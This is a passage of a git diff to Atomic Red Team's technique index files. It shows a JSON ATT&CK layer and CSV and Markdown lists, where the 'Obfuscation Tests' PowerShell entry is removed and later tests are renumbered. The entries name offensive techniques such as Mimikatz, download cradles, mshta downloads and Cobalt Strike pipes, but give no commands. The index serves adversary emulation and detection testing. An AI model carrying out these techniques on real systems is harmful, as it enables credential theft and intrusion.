Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ba3f85fd34..1a0a2da848 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -917,24 +917,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual -execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and 
Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML 
requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual +execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell +execution,T1059.001,Command and Scripting Interpreter: 
PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 71e5e0c86a..68094d9cb0 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -618,24 +618,23 @@ execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-be execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual -execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,PowerShell Session Creation and 
Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt -execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell -execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell XML 
requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual +execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell +execution,T1059.001,Command and Scripting Interpreter: 
PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 70d49e159b..86862318cf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -1239,24 +1239,23 @@ - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: Run BloodHound from local disk [windows] - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows] - - Atomic Test #4: Obfuscation Tests [windows] - - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows] - - Atomic Test #6: Invoke-AppPathBypass [windows] - - Atomic Test #7: Powershell MsXml COM object - with prompt [windows] - - Atomic Test #8: Powershell XML requests [windows] - - Atomic Test #9: Powershell invoke mshta.exe download [windows] - - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - - Atomic Test #11: PowerShell Fileless Script Execution [windows] - - Atomic Test #12: NTFS Alternate Data Stream Access [windows] - - Atomic Test #13: PowerShell Session Creation and Use [windows] - - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows] - - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - - Atomic Test #18: PowerShell Command Execution [windows] - - Atomic Test #19: 